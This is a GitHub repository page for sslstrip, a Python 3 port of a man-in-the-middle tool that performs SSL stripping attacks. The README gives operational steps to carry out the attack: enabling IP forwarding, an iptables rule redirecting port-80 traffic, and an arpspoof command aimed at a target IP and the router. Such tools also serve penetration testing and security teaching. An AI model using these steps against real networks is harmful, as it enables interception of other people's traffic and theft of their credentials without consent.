Skip to content

L1ghtn1ng/sslstrip

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

88 Commits
.github
.github
 
 
sslstrip
sslstrip
 
 
.gitignore
.gitignore
 
 
COPYING
COPYING
 
 
README.md
README.md
 
 
lock.ico
lock.ico
 
 
pyproject.toml
pyproject.toml
 
 
sslstrip.py
sslstrip.py
 
 

Repository files navigation

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.

Ported from Python v2 to v3 by Jay Townsend (theHarvester, Discover, and DNSrecon).

  • Twitter Follow Jay "L1ghtn1ng" Townsend @jay_townsend1

Requirements:
This project uses uv for dependency management. Get uv from here

Install the dependencies in a virtual environment

uv sync

Running:
sslstrip can be run from the source base without installation.
Run as a normal user to see options.
uv run sslstrip.py -h

  1. As root, enable IP forwarding:
    echo "1" > /proc/sys/net/ipv4/ip_forward

  2. As root, setup iptables to intercept HTTP requests:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <your listen port>

  3. Run sslstrip with the options you prefer.

  4. As root, run arpspoof to redirect traffic to your host:
    arpspoof -i <your network interface> -t <target IP> <routers IP>

About

A tool for exploiting Moxie Marlinspike's SSL "stripping" attack.

Resources

Readme

License

GPL-3.0 license
Activity

Stars

20 stars

Watchers

2 watching

Forks

13 forks
Report repository

Releases 3

4.0 Latest
Jul 21, 2025
+ 2 releases

Packages

No packages published

Languages

  • Python 100.0%